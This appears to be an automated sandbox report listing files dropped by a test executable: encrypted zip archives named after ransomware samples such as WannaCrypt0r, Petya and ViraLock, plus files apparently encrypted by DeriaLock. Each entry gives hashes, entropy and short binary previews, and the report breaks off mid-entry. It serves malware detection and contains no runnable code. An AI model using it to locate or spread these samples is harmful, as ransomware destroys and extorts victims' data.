                                                                                                                                                Preview:PK.........43L....C..........Endermanch@HappyAntivirus.exe.+...)hK..H.; N.:N...HU.2.....|........xbpeu....4...st.,O"...2...$.W..1V..a...>.\f.#p.\...$...<m..Z..:.a..z...Bp.b.B.P..pOZ%r.......J..&){.n..E....s.+C.X.._......c.fj..x+..p.X..U.:./!]}..t.b;..i.x6.bs....Z....@.0..k.v.&N.J.rlS....I.ig5.Ph.~......!O....y6..Kt....<..gR.V^.{...#.k|WTc..5.I.>..u.a.+..uo.!......b.o.%.<!f`:....^9U.5..e.&..aY..z.x../u..a.p..>`.jo,)..t3.)L..i..v....C:.....3..M.&Q0|H...}.b$..&....LP....n....q...\ez....}....B.=.>x(...q..kX.....=.;Sg.t..3.....be../k.w..<.q.i3..#\.:...i.j6..d.........,H.G5C%..W.E...Lm.|.....'...".{.7.z.X..m...m.2].Y.......8F...d..R..Il. .U..}.....P..!....1H:.,%=3.H..?..fD.K.....F.5.+T.c...g..N*1g...}1......,4.x..T...........K.3.....F.-..*..|.".[..Z:.%?....jy%....]..;o2zYY.p.1....>.8;......n.%|$.;px}..N.%...y.0.Z%.~.....f....@.3o|....nGE-..{2..@...$$..3[.....*.o.p.+....3.0[..../..v..(..%.@.......|...<X..........y_.f ......oKAN..F8..
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34300
                                                                                                                                                Entropy (8bit):7.994524271759185
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:xaTvxO0nJFcoYFY5Hn8tuWRHkD+unrGRcd0zOF9MzKh8yK4ZJy9ELob8a:EtOoJFSzt5BiGGmObB04Z09cobl
                                                                                                                                                MD5:5569BFE4F06724DD750C2A4690B79BA0
                                                                                                                                                SHA1:05414C7D5DACF43370AB451D28D4AC27BDCABF22
                                                                                                                                                SHA-256:CFA4DAAB47E6EB546323D4C976261AEFBA3947B4CCE1A655DDE9D9D6D725B527
                                                                                                                                                SHA-512:775BD600625DC5D293CFEBB208D7DC9B506B08DD0DA22124A7A69FB435756C2A309CBD3D813FC78543FD9BAE7E9B286A5BD83A956859C05F5656DAA96FCC2165
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........UMs2..>....L......Endermanch@InfinityCrypt.exe..Z9.o.KV.o.xug.]....Q~PY.QUkUH..:.TZ...E.(Y.N..n......)..#m....@....l.8.k..\.W,V8w...qU....N.|V.NtQ*.#2.YoP..S;.}|)..N.1.'?.....0e.aI.M..R..Zr..=}9.T+.....@]...Y..)!..z..b{......k5.C..WCU...no... |E.g.y....k.T......\'.O...7":s..D.m.L0....[I...`7.FA^.*.;...s..Nu.)...*7.E..L...U!..N.p...PG.C/...g...,...k.O8._...=...W.....%.-;.....,4s..ma...<+.h.0.....9A......&.].c..C`.?fQ.....g..R...>.....wF..0..x..vBIF;..m.s.E...d.R._=..i^dVV..Tq`...w.b......i...5..G.....|:|..k..l.....*..<..L.]...AV...t^,>T.nLW8W...pP.U..}..K.J]j....pc.2..d'...6.t..~...s74.K0M{.......ninG.lf|S.y3.t_.."9...kjG)..(.P...s\.......x%;....-d;...S.Y,.......-.... .1.D.S.....Q.<..2.6,.t......2..F..!.a.V......-=...t..S./....~..K.<..]f.ND...........U.t>.8[{.?...F..f...AQM`.+....K.m_JN...n...d@...G...w..k.......EY..?0./<......!...m<.<..@.42.....).)+..+...[HM..-Z~.X<......U............0w#...r...&.}.../3.t|z.........rmq}G..P...o.
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26359
                                                                                                                                                Entropy (8bit):7.99208020012939
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:gGkaFGuW/1rmxspfsYEOgDGjvZIxvTAd7i6BoBTYpk1:xhQBoSgDGDZQ0dhyj1
                                                                                                                                                MD5:1AEA5AD85DF3B14E216CC0200C708673
                                                                                                                                                SHA1:E3EE16E93BA7C3D7286DC9EBBAF940F0BCB6CAD3
                                                                                                                                                SHA-256:8DFA496C93680ADC10E77C0946C7927D3E58D79900013C95DFCA3411D766BD16
                                                                                                                                                SHA-512:06FAA190350E4558C6D4F1F201DC0698587495897593AAEAC16F3EA3D8C1C7F81D65BEEA6BC7E730CA1DF9BDFDF3CD2BCC84BF50F64787E0B1DBD21492796F36
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c...8..../f..).......Endermanch@Krotten.exe......AE...Q....>,.....}./A......r.=..@Nz....RGCZ.....{..H*.8..i..N.."W.+...@.;E..f....".l.t.f..rj..M@...V.Z../.i^Z.D...JX...J.m.5$F.Q...J..x.rF.....H#,:..t'..7...JKQJ.=..u\..M,.d.(<....,).dJ...~.Sg.......2...>...&Q}b.IJ.%`?6.~f..*......c.....a.f3...q......l....G..1`U...\..........e.Aw.R}W-s8.(.^..|.L..6.Q..N.2'.~..g..o.vQ......q.okL.4|*.#>"..G.0fN...L..b.*...pB...T%.BP],.B.RsRCa.....v..O.y...7V.......]4..q.n..{...........w-.}.oWT.v..c@......{.$....M^wC...Z..*o.p.].z...-xKd...{....P.T4/....n...B.+.JNn.LB.Z.`9E9".#g...v.'%..H7.f...l.I]e<q..C.D..x.G....=...zG.S.Q.+....iRS:..F.....S.8.A. .tH...Z-..x..U).......k...<...;^1..6..}AK.#......HI..@.X4.h|9V.^aZ.#.....B..P.|...gk...n...\-.....3..:P....Y.....^.....j..Ty..|{.%=Xt.;..Md..A....B}.0.K.T.....(.t..N..o...aU.`...HC. .)....<%.=%.....`....9j.<.Z..3k.^_i....!..s.3'.UP....3.Kc.].=.......c..-..k#K[.....{;...Oj...#Y..(.+k...D.F,..R.Ly.@.t.m...C..
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):938498
                                                                                                                                                Entropy (8bit):7.999770835729866
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:+FhIdZxByAl+XiqNk6n3DaeCTLD1yilc7KrBVw1lFVFDqE/zQRsAOfySS:AhAgo2ikhryLD1hcerklFVhqEMiAuySS
                                                                                                                                                MD5:F315E49D46914E3989A160BBCFC5DE85
                                                                                                                                                SHA1:99654BFEAAD090D95DEEF3A2E9D5D021D2DC5F63
                                                                                                                                                SHA-256:5CBB6442C47708558DA29588E0D8EF0B34C4716BE4A47E7C715EA844FBCF60D7
                                                                                                                                                SHA-512:224747B15D0713AFCB2641F8F3AA1687516D42E045D456B3ED096A42757A6C10C6626672366C9B632349CF6FFE41011724E6F4B684837DE9B719D0F351DFD22E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........J.i..FQ..........Endermanch@NoMoreRansom.exe.&P....\..J..vt.D('..i...!.}..V./.d..i...^..j...V.......dk?..o#....}.6.F.......IZ+.~.H.l.o.....z...r..TJ.^.1.7..b&B.@.C.....)...34]...~...m..Y...}...P.r...>.z.....".4T.>.........\..?..E...z....G...u..4...;"..;8.|.....*...Z.k.4....G.V..x.Si.%...K..Q.6.......+Y.?...m......{,l...Xe....C/W..$...j.,(....4a .1.'..f...3lG8.{..z........H]..N8.H...%g.....V.`.y..f..Y...Q.l....=*....p....x.o.".M%...L.fc......Z..".C.`.oU.......e.......S.G.n....L.j@..Y....^......E$..l.$...&......4...h...x.9U....d..9..-i.zt7.>....hJz...=.......p..1AEd....O..y....m..6.[.8 3..u..q[.i.K..d.a...H4*.]....#[.....=.....y.Y9......K_L4.7.....Y.@..}.T../.B.G.&`.......s.,.iQ.P}..O'~..5e...L..~......x'M..l.<.x.s}|....Jq.........Sv%.M.Q.!?....L....^24<..eP]..*.crf.&.....J.o..;.w(..5]..>.Wc x...R......J.X.>.XTU....".....p...[..v.E...V....~.....<...K........Lfm`..3M?....G.....J5.d..~...a.#...1......i.@6..?.c+.....?r'K..0.~...L.s.[
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):131293
                                                                                                                                                Entropy (8bit):7.998685171989688
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:7P2YmowJWNmYv5lnTc8R+igbpBgBXtzXW4Dg/PJLDEuUYBAald:r2YnzNmYBlI8hgdBgBXpXxDg/PJLDEH4
                                                                                                                                                MD5:1559522C34054E5144FE68EE98C29E61
                                                                                                                                                SHA1:FF80EEB6BCF4498C9FF38C252BE2726E65C10C34
                                                                                                                                                SHA-256:E99651AA5C5DCF9128ADC8DA685F1295B959F640A173098D07018B030D529509
                                                                                                                                                SHA-512:6DAB1F391AB1BEA12B799FCFB56D70CFBDBDE05AD350B53FCB782418495FAD1C275FE1A40F9EDD238473C3D532B4D87948BDDD140E5912F14AFF4293BE6E4B4C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........t.I.w.H+...........Endermanch@Petya.A.exe.i?mj.P.........N.d|....>.c.....%..N.....I....7{.F.O...2.wT:..g...dg...{._:....`.....L...jR.0.d,...5..!....*u6...N.n8..R..{.d...|.{.........[.....y.f..!.f.A.........nl...}...@.....X....6.....7...o...(:\....D.N5.h.Y...78&...U....EA......A.5l...[......_6'..F$...[.~qut...X>1n..4.S...~.[._|/..n...#....j5......N...Y{WwD..%s.Vo....T7Wn.jIRq].*!..Ky...la.-^.}..j.s^^s..._.....r.E.........9E%NK?..%.....IGf.y.....<Ok.E._(.sW.G..O.%.)`.Iam..b.j.l.g..~.W....|...c.L.....k0...a...`.q.sls...........1.p.....^....TRq}..0?...:..VU...#a..+.1f...9(....0.+\}.j..~.0.#.De..mk.$......X..1.......p....q&.._.<.j..e..6/,..D.G....c..v......47..jd...q.....eb.z.........x.W.h.M...M.8.x;....<$StHq....k..AP7...k...........X.5m..O.%S.Y....?m.6.J.#...7s..=.4.*....p^g.A..y......3P;.=C.mc.id.n$..D..np..f......_nQ.W.J..+.a.....s.l...;@.2.,B-|W..,.......U.r..n..WB...2..@SE=..A...V.& F.wy6.q....O$...z=6..*.....+nD#....i.C|f.-...~^?...
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):133759
                                                                                                                                                Entropy (8bit):7.9985193464243505
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:veAhzA234eL3kq97n2PxqzYwiYjeKPdwekrkb:veEhJ1keyKPz
                                                                                                                                                MD5:7A5AB2552C085F01A4D3C5F9D7718B99
                                                                                                                                                SHA1:E148CA4CCE695C19585B7815936F8E05BE22EB77
                                                                                                                                                SHA-256:ED8D4BB55444595FABB8172EE24FA2707AB401324F6F4D6B30A3CF04A51212D4
                                                                                                                                                SHA-512:33A0FE5830E669D9FAFBC6DBE1C8D1BD13730552FBA5798530EEB652BB37DCBC614555187E2CFD055F3520E5265FC4B1409DE88DCCD4BA9FE1E12D3C793EF632
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........yE4C.......p......Endermanch@PolyRansom.exeX.......%Q.......C.....]V.\.....#.X...z..K.'.uK..7..Gd%._u.G5..0..).Nz.h.....%._..TE....)..H....X.b.(.%]]D..."..0.|5..).G.-h'q.:...}b.1...:.^..d.d.t...9...iY+.....f...!.fn.sk..UG(......b..Rn_`....l....7W!...P.n{.....F...`C.'.....N...i.a..kD*V.XH......2....#...t.p.=..v.ykKDF..>..d.....4=.<.1..k.a...W..V:....m.1..g...U....l.s......../...3a.*.....TRG..N... ..Bm3.!.k.m.!..RIrjR;.^.n.....#.sW..lP4..!F...MR1..W.....u...@ ....#..[J{..U.....a6.fL.......HU...v-..<.HU ...jy.;..=........<._3..GP .%..(....K...s..%.....s.. .....Vb.N,.<.... v.(WM...j6.5.N..m....XzTm...$......[W..%!WY_......QAp..Y...#.3G.....b5...>......&.2.....&.QS.w.D.`...PF[.!.. ...h....-...`..?N........z...%.|..nD,VdW*d7....XC.(l.....+..0Z`................Ug..(..4.4...s.Zh.m._I!.f.6.|...-..aB..~iid"o. ...c..N.)..y....x..H....#|5.N...N..r..h..-c...>&v..d~e..9.A..(...2.6.?...;....D....-..w..~V..........U......$..[.(o*..........T.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.801657234078043
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Cxigj1E8f+YcPIb/GM7RtLB+5fx/3n//M1d+LH8LfgwFYO52DP8jTW4AEZsByG:cigj19+YcPIGM7RRAN381diQFYO52DPX
                                                                                                                                                MD5:BBFB597D8042635E8F930981CD3FFC33
                                                                                                                                                SHA1:805117A005E59CE0CBDF3E3ACECAC379E7E71186
                                                                                                                                                SHA-256:7D28CE9271250A60D241E16C35C4B174EDF5C98C9F2F1EE4DF3DDA84E7A30808
                                                                                                                                                SHA-512:2C7DC1478C2CE785C945C99A3D651569A4D65399E8161228F88B00B9A8CD44BB39E93B51E1967B7F1861A77709659F5835C0DA8FCC6272E83D77E4A0FF6C27C4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.......s)Z|.m...X.@.-E......F..&.....GE..4.8..vQr'.k..g.a....#.7...6.t.d_~v.q...O.s....;.750.,.n.ZI....m.Q.6..L7h......=WO. .[.8......Nn.w]......8>dPd....Qe...!.P....1v="..:Np..%..VMJ....o..o..CG...%...xG.y}n......U..%..G.@..6P}.+|W]).+n5B..Zs...sR.^....+Ga.!...<.|.\..F5?.q'.4[.mb.1.0.Q...e:Mk..v....)..=}_.Q....[.........6.D..B+N/U...-.a.... 3...E3.J:.....w.Y.S.#.N.......'.)rj.i...`c.....d...CP......O.?.PV.N..*.X.C..d.N.d.!..q.K.f.tG5....l.5..E:.D,>...t...uC.b.b/.y.WR..V..V........q....y.?P..;.....%.%.h..x..0.7...,..O.J.:.&......-.sL8h....f.}b8.]....xC?\.!v...]K+.2.7........=....R.2.=..Z..&..v........'.&...b+...........D.7VK.i-...8........`/....|...[.0{.4<=....ho.....E.#v8WNtw......A0.).....JD.%..3`P..'.Q.{..Z.Y..i..np["..5....6K[....j.kht..Y...-:.^...wn.......X.....0.rbU.....W..0.%..! .....:.'|X.x.b3.I...|w.c+y..Z....7.a.U`pxc..S.*>.#.O..../N<}<<.....)2...."...1.....D....ZX"...1^..:.#....D...&modD.^..h.*OW$.F.2..<_KV>n..T.E.&v.+..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.833611608517672
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:PaMyEqXTt0ya/6h51y+0JNNuk6JhPDvLwAQ3KxQ3zAWrp3KZkz2e:P6x00v1IzAk4rERaxQ30Wrp3Keqe
                                                                                                                                                MD5:AC916E7DA2E14CEDFA7937E1BCB82ABE
                                                                                                                                                SHA1:0602CDEF74991E003AB495D3A816B66FE15623B1
                                                                                                                                                SHA-256:D0AB32EABAFCF7DCAF6635C5D9ECFEFDA4650C6A33145CE42CA6BF2B8830068D
                                                                                                                                                SHA-512:BDB1A74EA9612493845D4722CA841835D6E8B9396633AC4C5C8545DC06F4ECA817FCECDC1AEF2C8313612675EC92E2BFDFB39E3962C0EA6B55FD8BC068413D17
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:Z...-........*..3?0.J._.h.U5M.]...Hm...S..|8.'.V.5...i.yZO.V.m.-..RU<.W...Q..}..uW........=Y.D..`..9..o.......2?.1x.......E.X..c....-.XB.-...)i.(x6.J{.?jH....n...'..........)(....v...b..}..%A.....g.... ......k.).........;h.<.^..b.......K....#..?I..Y.z.V..p.B0..R.:....5........0A\..T.g/..^..qQ.Y#.y.0..l......U:.c..<...."..|.y.....&."..p.:....M...b.YI....1....p..G_|.n-W..X%.t..B.2R.g.0..<.H.q...$....1....8..m.ZJ.k..s.eH...CZx..!..`.JLo..p..r'<.W.W....@.8C7...M.T.o..g....d.k8I.l...H.E.A_...A..7 ..s.9..|...;.9.P..a....J...$.G.>..6....+.._.....s...).z....$..M.,vA.E[L........\....r.....)s9....k.u..E.W....3..|......N..'S.U.g...x..p..@n6J..#....w.sR.Q..VE....?...l../.....~...G..p.........|....'..p...I.f8HRdy..&..y..7hhf....u.eV.G.A..1.). .>......us.S....}.NG.1..'..p.d.V+e.R....GV{..n..S.Z....G....V..fq.....|.1..zL..Yn.;...D..J.......)....R...Or.@...~....Cq...Eh..X.....a4.e..7....V...s......Z..a.|......s...a.#........e.....]J;.......W
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.812177604169259
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:aFESvoJFX/lW4nKW0bI9qsNOCyqQN1g8vEwgD78Fzv:mESwPP1KW0bI9+Cyqtqhgnozv
                                                                                                                                                MD5:632C910BDEF960ED69A8F22CFF4B5A07
                                                                                                                                                SHA1:1CEBAA6BEE9351113BE816AA8B7F7AD9687B2EAD
                                                                                                                                                SHA-256:79152717F5F4F0C927AC47D91698075B80F20242DAE86E35C5BF54497E24DFC7
                                                                                                                                                SHA-512:7F1767B3D7EEE5DB92B71B8E3E228CA943D24A4C3E2137B2097DA0A04D9D77C9E948293B83195A88F250BD1CFC478C44D56B735E9243A4E732BC7AD3BEED95D9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.;.Q.......3..e....i....!9.8..{Kh.e...}].|Tz_..G..s...Q!x"..-.y.Lj>.6..&N..LEjj..:+....p.b#..M........B.......UE.8O.a?.}.'...b..v`6.K.;%.Dm..w.aN.....}p..Q.....q.k....l.F]`..-/...J.&y.3.8%....E...2..XZ...6&..@j.w...w...=7..$.;2._.}....]P....+....../?>\.U...F.!..Z.Ox.|h.]....b<.#...$.....l\.._.@.kB.2...6h..n...>...^O!/.....O..i1.)G.af.c%..;..Gy.$35.(..7..*..o..*r.....J.{..6.>3..WH..@.0"...I6q'6,.!......F._}....AEH......?..j..8..q.t....)Xo'.mo.....u..p..z.EF..`. .u(.D......d.U.X.`............6\...F.^....O..R.....r.E.l...V.+.......Q.a..b..P0...g..O..s.v.p...wa.;:%.%X..=.>7..3.a.+...}..%.]...SD.1...|....Bj.d...9. ....;l.L}S..8..?Wk]...Eo..-.1E[.|..,...5_h..r.Sg..3i.<....@.....j.OL.:R..*....wtK...".|.K^.,q..K..#.3+. ...g.>.L.t[.u...;.(.1...T...?...G...(.*>.....~..{.5\&3a....e.a`.j..E.3....k.....Ud7R..u...O.....T^.R.t.p8s;.X...J^.\1....*S.G$O.N.L...j.y...).y......xg.9?-.oI..H...\.^.nx..CBwx..H..nBI^.......}C...u.@.2....f.A....H..yKx.U...n...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.825312415021255
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:R8izDqVK5yCe+7h4OiwGkyIsrMALXngG6Zkf0A34XPEo:TDOYyCe6hZ6IYDnPxWXso
                                                                                                                                                MD5:0A5B1B91BFBE933B0492D29DD655A1A6
                                                                                                                                                SHA1:827340A3EE0CE72C02BEDE9EFBFE7D5799DEBF68
                                                                                                                                                SHA-256:DC7DB688C1DEA58DD5D6DFB00FCEA3C7068A987B9E36BB0742A6A75C1DA6ACD1
                                                                                                                                                SHA-512:244B043D69038C3281275CBD8CAF80B569DF92CC297A607D910261E34633200BE455AD1CC6AD12D561535C1C6609C44D8419819F877F4BE4EF51AA0C35399FF4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:{._k........@.$....I.S.F?.jS..|..63..P.y....7....sxm....I...#}.t.:......1..=..5 ......|6.WC.S....Z\k?......v..KJ....M.tA.|.F......]y.....:.c.p.xfq.n.BL...)<....L.....1?3^.._..T:ivs?.f.\.^.......5`(.].!...B...[..b309m....*.A..-...e..ZI.......G.oc>..Y........Q....P.`.O.....O.[.;&...S..Y...j.2k....>*xa..=+.~q.D.,Eu.:Eb.....O.e ..K.].....Z_.c*T...K'.t..{..J<..3.?..ni.A....aw....6...t.....w.....).....#.&..zy...3\...=..Z........6.. 5:b....K.Q.U..."a.B.s./4.t......*q...<~.;..\Ku.......0J.......-.!....g/qW..k_d .{..~..8X.w.n..........W.7T..C.[.n&...F.'......}5.g)X.,7....8.8)[bTGg.<.Rr.F}././.`...!..B,U.^..P9/wb..>......h(U..N......_B.-..<z#H..g{....9T.>...s../.*..w...'1.#..h..C8...1....&2.H...."..!.....L....W#..E..":..T...x.....E7...h.63.N...c.........Vs..'.im...=.....7S"...S..W..Q...2....0).O.*|]....w.c........w.....|..u.....Um...di....M.s)}..p.\.;...V.D.X.^..h.g."..... \...{-...y;.?x...y.w.....G.O....5.{1....(.-.k8.!C2r. ..2mWW.=...Y`VGR.gP.A.&
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):135339
                                                                                                                                                Entropy (8bit):7.998464822213335
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:EVGcVUZ2RO+vvmYYN4ul1c0wTLcc0JuEzXiXoNn59cz+P+gJmq:EFVOYM4IwUc0JpzXYorWyL
                                                                                                                                                MD5:6A47990541C573D44444F9AD5AA61774
                                                                                                                                                SHA1:F230FFF199A57A07A972E2EE7169BC074D9E0CD5
                                                                                                                                                SHA-256:B161C762C5894D820CC10D9027F2404A6FEC3BC9F8FD84D23FF1DAEF98493115
                                                                                                                                                SHA-512:FE8A4FD268106817EFC0222C94CB26AD4AE0A39F99AACAA86880B8A2CAA83767FFE8A3DD5B0CDCC38B61F1B4D0196064856BD0191B9C2D7A8D8297C864A7716D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c..7yE................Endermanch@ViraLock.exe......AE....d...EJK.k....+.$?.X;....g.........>.jO..y.p:.d....~.......Y.y.....Q.....iy...\...}.....V.sL..@t...<....au.l=i.q..w..*..`..h.a.........3\.0.ox.i...C..f.=.E.....>..A....2.X.#.qml>...5.YLj]!Id.#...A .1n{8.D?.P5..<.G[.R...P.j..m<$...O.\v...%...R..s.M......:.;......*....!:.:-.5.p.....d%..C....^n.....,.l.qWN..T...rW.~zlz...<H....?.....m.so.e..*.k........?..bI....c.R...j...3...g.D.O.&B.".?)Z..=.y...J.^s.Z.....f.n...J..d7..&]...&..N.}e1......2w.w.:..C9W..B.T_..%.4....y.qa...Q'ry.f...;KY;e..VN...PE|..d....T....d..{........(..r..b1.R....J^...E.H|.B.q(..`.3.....Ge.........D...........R...>....?.#..B..s...Z=..y.E.Ux.m."p.i...p....Y...2..C..3].q.7...i7.C.Y.Eo...z..]... ......)H.;..D......+6.Q.d.o.d.=..e.O..[+...,..siV.1f.........[.....XTh....(.......fmf...m.......T..?....r...O..'#u.=.....Z....|d^..<....n.!.=dwos.|....e......ul.0.z....Bp..7|(~.Q...Z.>.._.V..W....t....2%.....7..+.....B....
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3477754
                                                                                                                                                Entropy (8bit):7.999945362964861
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:0x8KJHkctwJdVlgBq+q1vqtWdhQIajy4AsOLgVv+L3QXz+B7m1qyapDgJmeiTLW:0x8KJX+dVHvtzaj3xWgw79icXW
                                                                                                                                                MD5:E58FDD8B0CE47BCB8FFD89F4499D186D
                                                                                                                                                SHA1:B7E2334AC6E1AD75E3744661BB590A2D1DA98B03
                                                                                                                                                SHA-256:283F40E9D550833BEC101A24FD6FD6FBD9937ED32A51392E818FFFF662A1D30A
                                                                                                                                                SHA-512:95B6567B373EFA6AEC6A9BFD7AF70DED86F8C72D3E8BA75F756024817815B830F54D18143B0BE6DE335DD0CA0AFE722F88A4684663BE5A84946BD30343D43A8C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........J.."@>.5...5.....Endermanch@WannaCrypt0r.exeo..h.....7...8..].}..!..'...4...dl..W......n.g.1x.;..:..$W...)@..]t ...s.I..J...B.:.|.fcJ...HtS..}.X..Pe..0.....f5U.../..^@x.O...i.....c....:no..."m.O.$........<..H..f$...0..G..V.D..y..Wn....2.F......O-..j..&...'V. ...6..p......S.....b<1d.H.W._.d'..4v<M{...0|...CS.Tf...L....+.@kI.PV...ZM.tp..L.....I......!..!.@n..gcSDm,.......{M..-.a._..6`~..:<...DT...f..d.(..."..xOsr.1W..3.*.........lJ...!...=....N..8...zU..J{.n......(:.-V.(.&.n..M.#dkT.....T..O.>.3j.0...U...:). ..`.."1...yQZ..tt....B.....)3e}6.2.b.....q..D...g...?..!...1...6.....U...k..M.J......R..zf..c...&.e2>........L........(P=.......Vp.T..2..&9.U..+..WPT.....u.......0...!DmA..&S....n..d..I.Jz#!..7....vn7.?...~.H...Wy. .7K....#$..q...E{.B.An..>...\..#3bq.H...>;j........].....3_zk..k.......a"S^B.f...D0....<J...4#..MZs......E..._>.L8Kr.0..z.....F...Z..~..!.U.g{X.....i&1....EV.P...C...F((.....)C...I.5oW.....2.c....&...>C0..
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1654828
                                                                                                                                                Entropy (8bit):7.999880621363435
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:2OiR+zJsyziTwWQRtQWgpn8QbX1ncWFwUGVF6VpHk:2OVdzVW4tQWgp8QT1XFwUGKPk
                                                                                                                                                MD5:713F3673049A096EA23787A9BCB63329
                                                                                                                                                SHA1:B6DAD889F46DC19AE8A444B93B0A14248404C11D
                                                                                                                                                SHA-256:A62C54FEFDE2762426208C6E6C7F01EF2066FC837F94F5F36D11A36B3ECDDD5F
                                                                                                                                                SHA-512:810BDF865A25BDE85096E95C697BA7C1B79130B5E589C84AB93B21055B7341B5446D4E15905F7AA4CC242127D9ED1CF6F078B43FE452AD2E40695E5AB2BF8A18
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........HpF..`?...R&.#...Endermanch@WinlockerVB6Blacksod.exe....E9u.....!j%..R.l.M7.I......m...............x'...o..2...`.FU}.,..s.DI..|j,.zXxA...B..uG.y....v.d.jx....p.X..c.i.l/!..1..T.._.z0..o......#.A..dA".;'E...Q..F.J....5.X!.~l......<K&..1..oC.'..Y.\....gX..3...CJ.?./0..7[.|d..._...y..X#..a.;......-..2..|..G.%W...\m..Y.&w/....."\......@.R..m<tgZV*...y..9+ ....R.V....7.8t....7..........O PZcW.....e.....7..}.K...4.*.w.DK0...KbV.H..W<......g7.".js.H...f..\...2./KX..@.p........\.F"..S.r.-,.b._E.{...=...w..2;w.&.S..K.Fg[.d#v..R..<L.k.@..<2.t<.5}e...v...rP......6.?T....g..................#.........v......O.l;. ....=.{.m.......C..._..[$A1P.9....h.d.K.m._...:j.....:.kJ..."wz........6.+..yi......e....,5..%....J..k..I...;...s.?..\H..7=.$..VbU.#^........VIS>..Kw=W.YO..;.k.[$3..lM...G4U.9..)=....-.....'.Y......R....=.b.R..j.....?..y.,.......<GT"..Y.Z.....b...s.f.*...I.....[.D..J=...l.p.s3]g,....vD..8.]...QW..^..X.y9..:...I..........xA.oj.....
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):77102
                                                                                                                                                Entropy (8bit):7.997393453617121
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:0Nm7bj9DAfxcbnnOOPjaW7S3ayJpOGtz57MC4Wlzy1vG1NyY/:qAbj9EerOOPjV23ayeGpM+18c
                                                                                                                                                MD5:213743564D240175E53F5C1FEB800820
                                                                                                                                                SHA1:5A64C9771D2E0A8FAF569F1D0FB1A43D289E157C
                                                                                                                                                SHA-256:65F5D46ED07C5B5D44F1B96088226E1473F4A6341F7510495FE108FEF2A74575
